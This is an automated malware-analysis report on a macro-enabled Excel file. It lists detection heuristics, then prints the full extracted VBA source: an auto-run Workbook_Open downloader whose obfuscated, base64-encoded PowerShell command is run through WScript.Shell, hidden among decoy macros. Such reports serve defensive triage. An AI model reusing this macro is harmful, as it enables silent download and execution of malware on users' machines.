MALICIOUS
232
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The file is an OOXML document containing a Workbook_Open VBA macro. This macro utilizes CreateObject and WScript.Shell to execute obfuscated code that includes a URL, strongly indicating an attempt to download and execute a second-stage payload. The obfuscated nature of the script and the presence of a URL suggest a downloader or droppper functionality.
Heuristics 8
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
lhxfpvbqqlahybxkwfjeiijwqsyvlhhkktvol = "WSCript.shell" -
Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URLVBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.Matched line in script
lhxfpvbqqlahybxkwfjeiijwqsyvlhhkktvol = "WSCript.shell" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set vhzby = CreateObject(lhxfpvbqqlahybxkwfjeiijwqsyvlhhkktvol) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub workbook_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://brightcarbon.com/ Referenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 9839 bytes |
SHA-256: 1953a5aeb3eeadb3e8184c404200d29e4c3fa8fb4b418c6221a4df4f89121723 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 10 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub VBA_Presentation()
Dim PAplication As PowerPoint.Application
Dim PPT As PowerPoint.Presentation
Dim PPTSlide As PowerPoint.Slide
Dim PPTShapes As PowerPoint.Shape
Dim PPTCharts As Excel.ChartObject
Set PAplication = New PowerPoint.Application
PAplication.Visible = msoCTrue
PAplication.WindowState = ppWindowMaximized
End Sub
Private Sub workbook_open()
uml.sa
sda = gfdfsgfdf
End Sub
Sub InsertTextAtEndOfDocument()
ActiveDocument.Content.InsertAfter Text:=" The end."
End Sub
Attribute VB_Name = "Hoja1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "uml"
' Purpose : Displays a dialog box with a Hello World text message.
' Author : Jamie Garroch
' Date : 06MAY2019
' Website : https://brightcarbon.com/
'----------------------------------------------------------------------------------
Sub HelloWorld()
MsgBox "Hello World!", vbInformation + vbOKOnly, "This is my first VBA Macro"
End Sub
Sub sa()
nqg = kui(220) & kui(198) & kui(221) & kui(153) & kui(168) & kui(188) & kui(153) & kui(201) & kui(232) & kui(215) & kui(240) & kui(215) & kui(190) & kui(203) & kui(204) & kui(215) & kui(193) & kui(222) & kui(215) & kui(197) & kui(229) & kui(153) & kui(166) & kui(190) & kui(153)
nqg = nqg & "WwBTAHkAUwB0AEUATQAuAHQAZQBYAHQALgBFAG4AQwBPAEQASQBuAEcAXQA6ADoAdQBOAEkAQwBvAEQARQAuAGcARQB0AFMAVAByAGkATgBHACgAWwBTAHkAcwB0AGUATQAuAGMAbwBuAHYAZQByAHQAXQA6ADoARgBSAE8ATQBCAGEAcwBlADYANABzAFQAUgBJAE4ARwAoACIAZABBAEIAeQBBAEgAawBBAEkAQQBCADcAQQBHAFkAQQBiAHcAQgB5AEEAQwBBAEEASwBBAEEAawBBAEcAawBBAFAAUQBBAHgAQQBEAHMAQQBJAEEAQQBrAEEARwBrAEEASQBBAEEAdABBAEcAdwBBAFoAUQBBAGcAQQBEAEUAQQBNAGcAQQB3AEEARABBAEEATQBBAEEANwBBAEMAQQBBAEoAQQBCAHAAQQBDAHMAQQBLAHcAQQBwAEEAQwBBAEEAZQB3AEEAawBBAEcAawBBAEwAQQBBAGkAQQBHAEEAQQBiAGcAQQBpAEEASAAwAEEAZgBRAEEAZwBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEARABRAEEASwB"
nqg = nqg & "BAEcAWQBBAGQAUQBCAHUAQQBHAE0AQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAZwBBAEcARQBBAGUAQQBCAGoAQQBHADQAQQBiAGcAQgAzAEEASABZAEEAYwBBAEIAMwBBAEgAVQBBAGUAZwBCAGgAQQBIAG8AQQBjAHcAQgBsAEEARwAwAEEAWgBRAEIAbABBAEgASQBBAGEAUQBCAGwAQQBHAGcAQQBiAGcAQgBzAEEARwBrAEEAWQBnAEIANABBAEcARQBBAFoAQQBCAHMAQQBIAE0AQQBJAEEAQQBvAEEAQwBBAEEASgBBAEIAMABBAEcARQBBAGIAUQBCADUAQQBIAFEAQQBlAEEAQgB0AEEARwBVAEEAWgB3AEIAdgBBAEcAMABBAGUAQQBBAGcAQQBDAHcAQQBJAEEAQQBrAEEARwAwAEEAYwB3AEIAaQBBAEcAOABBAGMAUQBCAHgAQQBHADgAQQBkAFEAQgBwAEEARwBjAEEAYwBnAEIANABBAEgATQBBAGEAdwBCAHkAQQBHAFUAQQBJAEEAQQBwAEEAQQAwAEEAQwBnAEIANwBBAEMAQQBBAGEAUQBCAHQAQQBGAE"
nqg = nqg & "EAQQBUAHcAQgBTAEEASABRAEEATABRAEIATgBBAEcAOABBAFIAQQBCADEAQQBFAHcAQQBaAFEAQQBnAEEARQBJAEEAYQBRAEIAVQBBAEgATQBBAFYAQQBCAFMAQQBFAEUAQQBiAGcAQgBUAEEARwBZAEEAWgBRAEIAeQBBAEQAcwBBAEQAUQBBAEsAQQBIAE0AQQBkAEEAQgBoAEEASABJAEEAZABBAEEAdABBAEUASQBBAGEAUQBCADAAQQBGAE0AQQBWAEEAQgBTAEEARQBFAEEAYgBnAEIAVABBAEUAWQBBAFIAUQBCAHkAQQBDAEEAQQBMAFEAQgBUAEEARQA4AEEAVgBRAEIAeQBBAEUATQBBAFIAUQBBAGcAQQBDAFEAQQBkAEEAQgBoAEEARwAwAEEAZQBRAEIAMABBAEgAZwBBAGIAUQBCAGwAQQBHAGMAQQBiAHcAQgB0AEEASABnAEEASQBBAEEAdABBAEUAUQBBAFoAUQBCAHoAQQBGAFEAQQBTAFEAQgB1AEEARwBFAEEAZABBAEIASgBBAEUAOABBAFQAZwBBAGcAQQBDAFEAQQBiAFEAQgB6AEEARwBJAEEAY"
nqg = nqg & "gB3AEIAeABBAEgARQBBAGIAdwBCADEAQQBHAGsAQQBaAHcAQgB5AEEASABnAEEAYwB3AEIAcgBBAEgASQBBAFoAUQBBADcAQQBDAEEAQQBKAGcAQQBnAEEAQwBRAEEAYgBRAEIAegBBAEcASQBBAGIAdwBCAHgAQQBIAEUAQQBiAHcAQgAxAEEARwBrAEEAWgB3AEIAeQBBAEgAZwBBAGMAdwBCAHIAQQBIAEkAQQBaAFEAQQA3AEEAQwBBAEEAZgBRAEIAMABBAEgASQBBAGUAUQBCADcAQQBDAFEAQQBiAFEAQgBvAEEARwBNAEEAZQBRAEIAcQBBAEgARQBBAFoAQQBCAG4AQQBHAFkAQQBiAFEAQgB3AEEASABjAEEAYQBBAEIAMwBBAEcAZwBBAGUAQQBBADkAQQBDAFEAQQBaAFEAQgB1AEEARgBZAEEATwBnAEIAVQBBAEcAVQBBAGIAUQBCAFEAQQBDAHMAQQBKAHcAQgBjAEEASABVAEEAWQBnAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBPAHcAQQBOAEEAQQBvAEEAWQBRAEIANABBAEcATQBBAGIAZwBC"
nqg = nqg & "AHUAQQBIAGMAQQBkAGcAQgB3AEEASABjAEEAZABRAEIANgBBAEcARQBBAGUAZwBCAHoAQQBHAFUAQQBiAFEAQgBsAEEARwBVAEEAYwBnAEIAcABBAEcAVQBBAGEAQQBCAHUAQQBHAHcAQQBhAFEAQgBpAEEASABnAEEAWQBRAEIAawBBAEcAdwBBAGMAdwBBAGcAQQBDAGMAQQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAE0AQQBaAEEAQgB1AEEAQwA0AEEAWgBBAEIAcABBAEgATQBBAFkAdwBCAHYAQQBIAEkAQQBaAEEAQgBoAEEASABBAEEAYwBBAEEAdQBBAEcATQBBAGIAdwBCAHQAQQBDADgAQQBZAFEAQgAwAEEASABRAEEAWQBRAEIAagBBAEcAZwBBAGIAUQBCAGwAQQBHADQAQQBkAEEAQgB6AEEAQwA4AEEATwBBAEEAMwBBAEQAVQBBAE4AQQBBAHcAQQBEAEUAQQBNAHcAQQAwAEEARABJAEEATQBRAEEAMwBBAEQAVQBBAE0AdwBBAHcAQQBEAEUAQQBOAGcAQQAxAEE"
nqg = nqg & "ARABVAEEATAB3AEEANABBAEQAYwBBAE4AdwBBADEAQQBEAGMAQQBNAHcAQQB4AEEARABBAEEATgBnAEEANQBBAEQAQQBBAE8AUQBBAHgAQQBEAGsAQQBOAGcAQQB6AEEARABnAEEATwBBAEEAdgBBAEQAawBBAFUAUQBCAEgAQQBIAEUAQQBVAHcAQQAyAEEARgBZAEEAWQB3AEIATwBBAEUAOABBAFoAdwBCAFEAQQBHAHMAQQBlAEEAQgBUAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBAGcAQQBDAFEAQQBiAFEAQgBvAEEARwBNAEEAZQBRAEIAcQBBAEgARQBBAFoAQQBCAG4AQQBHAFkAQQBiAFEAQgB3AEEASABjAEEAYQBBAEIAMwBBAEcAZwBBAGUAQQBBADcAQQBBADAAQQBDAGcAQgBoAEEASABnAEEAWQB3AEIAdQBBAEcANABBAGQAdwBCADIAQQBIAEEAQQBkAHcAQgAxAEEASABvAEEAWQBRAEIANgBBAEgATQBBAFoAUQBCAHQAQQBHAFUAQQBaAFEAQgB5AEEARwBrAEEAWgBRAEIAbwBBAEcANA"
nqg = nqg & "BBAGIAQQBCAHAAQQBHAEkAQQBlAEEAQgBoAEEARwBRAEEAYgBBAEIAegBBAEMAQQBBAEoAdwBCAG8AQQBIAFEAQQBkAEEAQgB3AEEASABNAEEATwBnAEEAdgBBAEMAOABBAFkAdwBCAGsAQQBHADQAQQBMAGcAQgBrAEEARwBrAEEAYwB3AEIAagBBAEcAOABBAGMAZwBCAGsAQQBHAEUAQQBjAEEAQgB3AEEAQwA0AEEAWQB3AEIAdgBBAEcAMABBAEwAdwBCAGgAQQBIAFEAQQBkAEEAQgBoAEEARwBNAEEAYQBBAEIAdABBAEcAVQBBAGIAZwBCADAAQQBIAE0AQQBMAHcAQQA0AEEARABjAEEATgBRAEEAMABBAEQAQQBBAE0AUQBBAHoAQQBEAFEAQQBNAGcAQQB4AEEARABjAEEATgBRAEEAegBBAEQAQQBBAE0AUQBBADIAQQBEAFUAQQBOAFEAQQB2AEEARABnAEEATgB3AEEAMwBBAEQAVQBBAE4AdwBBAHoAQQBEAEUAQQBNAEEAQQAyAEEARABrAEEATQBBAEEANQBBAEQARQBBAE8AUQBBADIAQQBEAE0AQQBPA"
nqg = nqg & "EEAQQA0AEEAQwA4AEEATwBRAEIAUgBBAEUAYwBBAGMAUQBCAFQAQQBEAFkAQQBWAGcAQgBqAEEARQA0AEEAVAB3AEIAbgBBAEYAQQBBAGEAdwBCADQAQQBGAE0AQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAbgBBAEMAQQBBAEoAQQBCAHQAQQBHAGcAQQBZAHcAQgA1AEEARwBvAEEAYwBRAEIAawBBAEcAYwBBAFoAZwBCAHQAQQBIAEEAQQBkAHcAQgBvAEEASABjAEEAYQBBAEIANABBAEQAcwBBAEQAUQBBAEsAQQBHAEUAQQBlAEEAQgBqAEEARwA0AEEAYgBnAEIAMwBBAEgAWQBBAGMAQQBCADMAQQBIAFUAQQBlAGcAQgBoAEEASABvAEEAYwB3AEIAbABBAEcAMABBAFoAUQBCAGwAQQBIAEkAQQBhAFEAQgBsAEEARwBnAEEAYgBnAEIAcwBBAEcAawBBAFkAZwBCADQAQQBHAEUAQQBaAEEAQgBzAEEASABNAEEASQBBAEEAbgBBAEcAZwBBAGQAQQBCADAAQQBIAEEAQQBjAHcAQQA2AEEAQwA4AEEATAB3AEIA"
nqg = nqg & "agBBAEcAUQBBAGIAZwBBAHUAQQBHAFEAQQBhAFEAQgB6AEEARwBNAEEAYgB3AEIAeQBBAEcAUQBBAFkAUQBCAHcAQQBIAEEAQQBMAGcAQgBqAEEARwA4AEEAYgBRAEEAdgBBAEcARQBBAGQAQQBCADAAQQBHAEUAQQBZAHcAQgBvAEEARwAwAEEAWgBRAEIAdQBBAEgAUQBBAGMAdwBBAHYAQQBEAGcAQQBOAHcAQQAxAEEARABRAEEATQBBAEEAeABBAEQATQBBAE4AQQBBAHkAQQBEAEUAQQBOAHcAQQAxAEEARABNAEEATQBBAEEAeABBAEQAWQBBAE4AUQBBADEAQQBDADgAQQBPAEEAQQAzAEEARABjAEEATgBRAEEAMwBBAEQATQBBAE0AUQBBAHcAQQBEAFkAQQBPAFEAQQB3AEEARABrAEEATQBRAEEANQBBAEQAWQBBAE0AdwBBADQAQQBEAGcAQQBMAHcAQQA1AEEARgBFAEEAUgB3AEIAeABBAEYATQBBAE4AZwBCAFcAQQBHAE0AQQBUAGcAQgBQAEEARwBjAEEAVQBBAEIAcgBBAEgAZwBBAFUAdwBBAHUAQQB"
nqg = nqg & "HAFUAQQBlAEEAQgBsAEEAQwBjAEEASQBBAEEAawBBAEcAMABBAGEAQQBCAGoAQQBIAGsAQQBhAGcAQgB4AEEARwBRAEEAWgB3AEIAbQBBAEcAMABBAGMAQQBCADMAQQBHAGcAQQBkAHcAQgBvAEEASABnAEEATwB3AEEATgBBAEEAbwBBAGYAUQBCAGoAQQBHAEUAQQBkAEEAQgBqAEEARwBnAEEAZQB3AEIAOQBBAEEAPQA9ACIAKQApAHwAaQBlAFgA"
On Error Resume Next
prezigsc = nqg
prntkeeanq (prezigsc)
End Sub
Sub dsffsdfds()
Dim PAplication As PowerPoint.Application
Dim PPT As PowerPoint.Presentation
Dim PPTSlide As PowerPoint.Slide
Dim PPTShapes As PowerPoint.Shape
Dim PPTCharts As Excel.ChartObject
Set PAplication = New PowerPoint.Application
PAplication.Visible = msoCTrue
PAplication.WindowState = ppWindowMaximized
Set PPT = PAplication.Presentations.Add
For Each PPTCharts In ActiveSheet.ChartObjects
Next PPTCharts
End Sub
Function prntkeeanq(ekrpxyknmkrdnzqyrkywprixgukrt As String)
yqefljepodsljyziktokcr = 11 - 11
hgfh = "bfgghd jhfg gdfg"
lhxfpvbqqlahybxkwfjeiijwqsyvlhhkktvol = "WSCript.shell"
Set vhzby = CreateObject(lhxfpvbqqlahybxkwfjeiijwqsyvlhhkktvol)
doatabrnwbndkkvbnbuido = vhzby.Run(ekrpxyknmkrdnzqyrkywprixgukrt, yqefljepodsljyziktokcr)
End Function
Sub InsertingSlide()
'
' Macro recorded #date# by Russell Proctor
'
ActiveWindow.View.GotoSlide Index:=ActivePresentation.Slides.Add(Index:=2, Layout:=ppLayoutText).SlideIndex
ActiveWindow.Selection.SlideRange.Shapes("Rectangle 2").Select
ActiveWindow.Selection.ShapeRange.TextFrame.TextRange.Select
ActiveWindow.Selection.ShapeRange.TextFrame.TextRange.Characters(Start:=1, Length:=0).Select
With ActiveWindow.Selection.TextRange
.Text = "Another Slide"
With .Font
.Name = "Arial"
.Size = 44
.Bold = msoFalse
.Italic = msoFalse
.Underline = msoFalse
.Shadow = msoFalse
.Emboss = msoFalse
.BaselineOffset = 0
.AutorotateNumbers = msoFalse
.Color.SchemeColor = ppTitle
End With
End With
End Sub
Function kui(fscv As Variant)
sdfgf = "ghtr bfgdfj 5t64"
kui = Chr(fscv - 121)
bvcxb = "gfdsg bvxcvv gsdg et vbdfb xbcvx"
End Function
Sub dsadsa()
ActiveWindow.View.GotoSlide Index:=ActivePresentation.Slides.Add(Index:=2, Layout:=ppLayoutText).SlideIndex
ActiveWindow.Selection.SlideRange.Shapes("Rectangle 2").Select
ActiveWindow.Selection.SlideRange.Shapes("Rectangle 2").TextFrame.TextRange.Text = "Another Slide"
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 31232 bytes |
SHA-256: ac6b85e940ac7f0111521a4103862302e6cd478eb99d3797dccd1a49a9b2df97 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 10 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.